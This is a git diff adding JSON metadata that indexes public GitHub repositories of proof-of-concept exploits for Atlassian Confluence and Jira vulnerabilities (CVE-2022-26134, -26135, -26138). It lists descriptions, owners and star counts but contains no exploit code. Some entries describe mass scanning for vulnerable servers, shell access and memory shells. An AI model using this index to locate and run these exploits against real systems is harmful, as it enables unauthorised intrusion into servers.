"payload", + "python", + "rce", + "unauthenticated" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510946912, + "name": "cve-2022-26134", + "full_name": "f4yd4-s3c\/cve-2022-26134", + "owner": { + "login": "f4yd4-s3c", + "id": 68352308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68352308?v=4", + "html_url": "https:\/\/github.com\/f4yd4-s3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f4yd4-s3c\/cve-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-07-06T01:27:21Z", + "updated_at": "2022-07-23T16:53:31Z", + "pushed_at": "2022-08-28T04:05:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 511886087, + "name": "CVE-2022-26134", + "full_name": "coskper-papa\/CVE-2022-26134", + "owner": { + "login": "coskper-papa", + "id": 90187053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90187053?v=4", + "html_url": "https:\/\/github.com\/coskper-papa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coskper-papa\/CVE-2022-26134", + "description": "confluence rce", + "fork": false, + "created_at": "2022-07-08T12:24:21Z", + "updated_at": "2024-08-12T20:24:50Z", + "pushed_at": "2022-07-08T12:31:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513011701, + "name": "confusploit", + "full_name": "p4b3l1t0\/confusploit", + "owner": { + "login": "p4b3l1t0", + "id": 59421032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59421032?v=4", + "html_url": "https:\/\/github.com\/p4b3l1t0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p4b3l1t0\/confusploit", + "description": "This is a python script that can be used with Shodan CLI to mass hunting Confluence Servers vulnerable to CVE-2022-26134", + "fork": false, + "created_at": "2022-07-12T05:34:09Z", + "updated_at": "2023-01-11T20:02:19Z", + "pushed_at": "2024-06-19T00:41:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513720732, + "name": "CVE-2022-26134-PoC", + "full_name": "twoning\/CVE-2022-26134-PoC", + "owner": { + "login": "twoning", + "id": 107823435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107823435?v=4", + "html_url": "https:\/\/github.com\/twoning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twoning\/CVE-2022-26134-PoC", + "description": "CVE-2022-26134-PoC", + "fork": false, + "created_at": "2022-07-14T01:28:16Z", + "updated_at": "2022-07-14T10:35:04Z", + "pushed_at": "2022-07-14T01:31:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514222017, + "name": "cve-2022-26134", + "full_name": "iveresk\/cve-2022-26134", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-26134", + "description": "Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.", + "fork": false, + "created_at": "2022-07-15T10:06:15Z", + "updated_at": "2024-02-07T13:03:55Z", + "pushed_at": "2022-07-21T14:24:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517082112, + "name": "CVE-2022-26134", + "full_name": "keven1z\/CVE-2022-26134", + "owner": { + "login": "keven1z", + "id": 43847458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43847458?v=4", + "html_url": "https:\/\/github.com\/keven1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keven1z\/CVE-2022-26134", + "description": "远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。", + "fork": false, + "created_at": "2022-07-23T14:38:11Z", + "updated_at": "2022-10-29T13:45:18Z", + "pushed_at": "2022-07-25T05:51:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2022-26134" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 527499750, + "name": "CVE-2022-26134-Console", + "full_name": "shiftsansan\/CVE-2022-26134-Console", + "owner": { + "login": "shiftsansan", + "id": 104987706, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104987706?v=4", + "html_url": "https:\/\/github.com\/shiftsansan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiftsansan\/CVE-2022-26134-Console", + "description": "CVE-2022-26134-Console", + "fork": false, + "created_at": "2022-08-22T09:40:43Z", + "updated_at": "2024-08-12T20:26:23Z", + "pushed_at": "2022-08-23T11:06:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529162323, + "name": "CVE-2022-26134web", + "full_name": "1337in\/CVE-2022-26134web", + "owner": { + "login": "1337in", + "id": 32819740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32819740?v=4", + "html_url": "https:\/\/github.com\/1337in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337in\/CVE-2022-26134web", + "description": "CVE-2022-26134 web payload", + "fork": false, + "created_at": "2022-08-26T07:38:29Z", + "updated_at": "2022-08-28T15:03:38Z", + "pushed_at": "2022-08-26T07:40:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548488626, + "name": "CVE-2022-26134-LAB", + "full_name": "skhalsa-sigsci\/CVE-2022-26134-LAB", + "owner": { + "login": "skhalsa-sigsci", + "id": 68570441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68570441?v=4", + "html_url": "https:\/\/github.com\/skhalsa-sigsci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skhalsa-sigsci\/CVE-2022-26134-LAB", + "description": "Detecting CVE-2022-26134 using Nuclei", + "fork": false, + "created_at": "2022-10-09T17:15:07Z", + "updated_at": "2023-08-25T22:41:38Z", + "pushed_at": "2022-10-09T17:53:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551806207, + "name": "CVE-2022-26134-cve1", + "full_name": "yigexioabai\/CVE-2022-26134-cve1", + "owner": { + "login": "yigexioabai", + "id": 110800918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110800918?v=4", + "html_url": "https:\/\/github.com\/yigexioabai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yigexioabai\/CVE-2022-26134-cve1", + "description": null, + "fork": false, + "created_at": "2022-10-15T06:01:53Z", + "updated_at": "2022-10-15T14:34:57Z", + "pushed_at": "2022-10-15T14:56:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552009446, + "name": "CVE-2022-26134", + "full_name": "kailing0220\/CVE-2022-26134", + "owner": { + "login": "kailing0220", + "id": 115863969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115863969?v=4", + "html_url": "https:\/\/github.com\/kailing0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kailing0220\/CVE-2022-26134", + "description": "在受影响的Confluence Server 和Data Center 版本中,存在一个OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在Confluence Server 或Data Center 服务器上执行任意代码。", + "fork": false, + "created_at": "2022-10-15T15:56:41Z", + "updated_at": "2022-11-19T03:07:42Z", + "pushed_at": "2022-10-15T16:07:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552300832, + "name": "ATLASSIAN-Confluence_rce", + "full_name": "xanszZZ\/ATLASSIAN-Confluence_rce", + "owner": { + "login": "xanszZZ", + "id": 115653953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115653953?v=4", + "html_url": "https:\/\/github.com\/xanszZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xanszZZ\/ATLASSIAN-Confluence_rce", + "description": "批量检测CVE-2022-26134 RCE漏洞", + "fork": false, + "created_at": "2022-10-16T09:19:56Z", + "updated_at": "2022-10-17T06:36:47Z", + "pushed_at": "2022-10-16T15:09:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552328370, + "name": "CVE-2022-26134", + "full_name": "kelemaoya\/CVE-2022-26134", + "owner": { + "login": "kelemaoya", + "id": 115539074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115539074?v=4", + "html_url": "https:\/\/github.com\/kelemaoya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kelemaoya\/CVE-2022-26134", + "description": "Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。", + "fork": false, + "created_at": "2022-10-16T10:44:51Z", + "updated_at": "2022-10-18T09:07:52Z", + "pushed_at": "2022-10-16T10:59:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552331644, + "name": "cve-2022-26134", + "full_name": "CJ-0107\/cve-2022-26134", + "owner": { + "login": "CJ-0107", + "id": 112550674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112550674?v=4", + "html_url": "https:\/\/github.com\/CJ-0107", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CJ-0107\/cve-2022-26134", + "description": "cve-2022-26134", + "fork": false, + "created_at": "2022-10-16T10:55:12Z", + "updated_at": "2022-10-16T10:55:56Z", + "pushed_at": "2022-10-16T10:55:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552345477, + "name": "CVE-2022-26134", + "full_name": "latings\/CVE-2022-26134", + "owner": { + "login": "latings", + "id": 112951518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112951518?v=4", + "html_url": "https:\/\/github.com\/latings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/latings\/CVE-2022-26134", + "description": "CVE-2022-26134", + "fork": false, + "created_at": "2022-10-16T11:37:33Z", + "updated_at": "2022-10-16T12:03:51Z", + "pushed_at": "2022-10-16T12:14:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552349055, + "name": "CVE-2022-26134", + "full_name": "yyqxi\/CVE-2022-26134", + "owner": { + "login": "yyqxi", + "id": 115715353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115715353?v=4", + "html_url": "https:\/\/github.com\/yyqxi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yyqxi\/CVE-2022-26134", + "description": "CVE-2022-26134poc", + "fork": false, + "created_at": "2022-10-16T11:48:42Z", + "updated_at": "2022-10-16T12:08:42Z", + "pushed_at": "2022-10-16T12:08:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 556916436, + "name": "CVE-2022-26134", + "full_name": "b4dboy17\/CVE-2022-26134", + "owner": { + "login": "b4dboy17", + "id": 83988282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83988282?v=4", + "html_url": "https:\/\/github.com\/b4dboy17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4dboy17\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-10-24T19:00:25Z", + "updated_at": "2023-02-09T19:30:02Z", + "pushed_at": "2022-10-24T19:03:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582078950, + "name": "CVE-2022-26134", + "full_name": "wjlin0\/CVE-2022-26134", + "owner": { + "login": "wjlin0", + "id": 91306421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91306421?v=4", + "html_url": "https:\/\/github.com\/wjlin0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wjlin0\/CVE-2022-26134", + "description": "CVE-2022-26134 GO POC 练习", + "fork": false, + "created_at": "2022-12-25T15:29:14Z", + "updated_at": "2022-12-26T05:18:26Z", + "pushed_at": "2022-12-26T05:27:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589327553, + "name": "CVE-2022-26134_check", + "full_name": "cbk914\/CVE-2022-26134_check", + "owner": { + "login": "cbk914", + "id": 2042196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", + "html_url": "https:\/\/github.com\/cbk914", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbk914\/CVE-2022-26134_check", + "description": null, + "fork": false, + "created_at": "2023-01-15T20:11:27Z", + "updated_at": "2023-01-19T23:43:17Z", + "pushed_at": "2023-01-15T20:14:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 597319077, + "name": "CVE-2022-26134_Behinder_MemShell", + "full_name": "MaskCyberSecurityTeam\/CVE-2022-26134_Behinder_MemShell", + "owner": { + "login": "MaskCyberSecurityTeam", + "id": 107802263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107802263?v=4", + "html_url": "https:\/\/github.com\/MaskCyberSecurityTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaskCyberSecurityTeam\/CVE-2022-26134_Behinder_MemShell", + "description": null, + "fork": false, + "created_at": "2023-02-04T06:51:47Z", + "updated_at": "2024-01-12T09:31:33Z", + "pushed_at": "2023-02-04T07:18:25Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 672663443, + "name": "Atlassian_CVE-2022-26134", + "full_name": "Muhammad-Ali007\/Atlassian_CVE-2022-26134", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/Atlassian_CVE-2022-26134", + "description": "Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)", + "fork": false, + "created_at": "2023-07-30T20:56:13Z", + "updated_at": "2023-08-03T21:18:52Z", + "pushed_at": "2023-08-03T21:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 694339159, + "name": "CVE-2022-26134", + "full_name": "acfirthh\/CVE-2022-26134", + "owner": { + "login": "acfirthh", + "id": 59393271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59393271?v=4", + "html_url": "https:\/\/github.com\/acfirthh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acfirthh\/CVE-2022-26134", + "description": "A PoC for CVE-2022-26134 for Educational Purposes and Security Research", + "fork": false, + "created_at": "2023-09-20T19:54:05Z", + "updated_at": "2024-07-15T15:33:52Z", + "pushed_at": "2023-09-20T20:08:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cybersecurity", + "cybersecurity-education", + "research", + "security-research", + "tryhackme" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707572955, + "name": "CVE-2022-26134", + "full_name": "yTxZx\/CVE-2022-26134", + "owner": { + "login": "yTxZx", + "id": 100921463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4", + "html_url": "https:\/\/github.com\/yTxZx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yTxZx\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2023-10-20T07:42:36Z", + "updated_at": "2023-10-20T07:43:08Z", + "pushed_at": "2023-10-20T08:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736886495, + "name": "-CVE-2022-26134", + "full_name": "DARKSTUFF-LAB\/-CVE-2022-26134", + "owner": { + "login": "DARKSTUFF-LAB", + "id": 109729013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109729013?v=4", + "html_url": "https:\/\/github.com\/DARKSTUFF-LAB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DARKSTUFF-LAB\/-CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2023-12-29T06:51:38Z", + "updated_at": "2023-12-29T06:51:51Z", + "pushed_at": "2023-12-29T06:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777796929, + "name": "CVE-2022-26134-POC", + "full_name": "404fu\/CVE-2022-26134-POC", + "owner": { + "login": "404fu", + "id": 144592414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144592414?v=4", + "html_url": "https:\/\/github.com\/404fu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/404fu\/CVE-2022-26134-POC", + "description": null, + "fork": false, + "created_at": "2024-03-26T14:18:17Z", + "updated_at": "2024-03-26T14:43:14Z", + "pushed_at": "2024-03-26T14:34:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795180088, + "name": "CVE-2022-26134", + "full_name": "xsxtw\/CVE-2022-26134", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2024-05-02T18:31:54Z", + "updated_at": "2024-05-02T18:33:42Z", + "pushed_at": "2024-05-02T18:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807402056, + "name": "Confluence-RCE", + "full_name": "BBD-YZZ\/Confluence-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE", + "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)", + "fork": false, + "created_at": "2024-05-29T03:20:22Z", + "updated_at": "2024-09-22T06:25:09Z", + "pushed_at": "2024-08-26T09:24:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812067894, + "name": "CVE-2022-26134", + "full_name": "cc3305\/CVE-2022-26134", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2022-26134", + "description": "CVE-2022-26134 exploit script", + "fork": false, + "created_at": "2024-06-07T22:15:48Z", + "updated_at": "2024-07-27T20:17:27Z", + "pushed_at": "2024-07-27T20:17:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871981798, + "name": "CVE-2022-26134", + "full_name": "Agentgilspy\/CVE-2022-26134", + "owner": { + "login": "Agentgilspy", + "id": 67920312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67920312?v=4", + "html_url": "https:\/\/github.com\/Agentgilspy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Agentgilspy\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2024-10-13T13:38:07Z", + "updated_at": "2024-11-17T11:19:13Z", + "pushed_at": "2024-11-17T11:19:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892944519, + "name": "cve-2022-26134-poc", + "full_name": "XiaomingX\/cve-2022-26134-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2022-26134-poc", + "description": "CVE-2022-26134 是一个影响 Atlassian Confluence Server 和 Data Center 的 远程代码执行漏洞(RCE),其成因是服务器处理 OGNL 表达式时未能正确过滤输入,从而允许攻击者以特权账户权限执行任意代码。", + "fork": false, + "created_at": "2024-11-23T05:35:59Z", + "updated_at": "2024-11-24T06:37:06Z", + "pushed_at": "2024-11-23T05:38:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26135.json b/2022/CVE-2022-26135.json new file mode 100644 index 0000000000..64f210f653 --- /dev/null +++ b/2022/CVE-2022-26135.json @@ -0,0 +1,69 @@ +[ + { + "id": 506925900, + "name": "jira-mobile-ssrf-exploit", + "full_name": "assetnote\/jira-mobile-ssrf-exploit", + "owner": { + "login": "assetnote", + "id": 35264812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35264812?v=4", + "html_url": "https:\/\/github.com\/assetnote", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/assetnote\/jira-mobile-ssrf-exploit", + "description": "Exploit code for Jira Mobile Rest Plugin SSRF (CVE-2022-26135)", + "fork": false, + "created_at": "2022-06-24T07:55:52Z", + "updated_at": "2024-10-03T05:16:25Z", + "pushed_at": "2022-07-05T21:13:44Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26135", + "exploit", + "jira", + "ssrf" + ], + "visibility": "public", + "forks": 18, + "watchers": 87, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 511445168, + "name": "CVE-2022-26135", + "full_name": "safe3s\/CVE-2022-26135", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-26135", + "description": " CVE-2022-26135 ", + "fork": false, + "created_at": "2022-07-07T08:28:02Z", + "updated_at": "2022-10-13T02:53:07Z", + "pushed_at": "2022-07-12T16:36:44Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26138.json b/2022/CVE-2022-26138.json new file mode 100644 index 0000000000..345b0742cc --- /dev/null +++ b/2022/CVE-2022-26138.json @@ -0,0 +1,132 @@ +[ + { + "id": 516306618, + "name": "CVE-2022-26138", + "full_name": "alcaparra\/CVE-2022-26138", + "owner": { + "login": "alcaparra", + "id": 105424007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105424007?v=4", + "html_url": "https:\/\/github.com\/alcaparra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alcaparra\/CVE-2022-26138", + "description": "Atlassian Questions Hardcoded Password (CVE-2022-26138)", + "fork": false, + "created_at": "2022-07-21T09:28:06Z", + "updated_at": "2024-08-12T20:25:17Z", + "pushed_at": "2022-07-26T12:06:14Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "confluence", + "cve", + "cve-2022-26138", + "poc" + ], + "visibility": "public", + "forks": 10, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 518788417, + "name": "Confluence-Question-CVE-2022-26138-", + "full_name": "Vulnmachines\/Confluence-Question-CVE-2022-26138-", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Confluence-Question-CVE-2022-26138-", + "description": "Atlassian Confluence Server and Data Center: CVE-2022-26138", + "fork": false, + "created_at": "2022-07-28T09:48:21Z", + 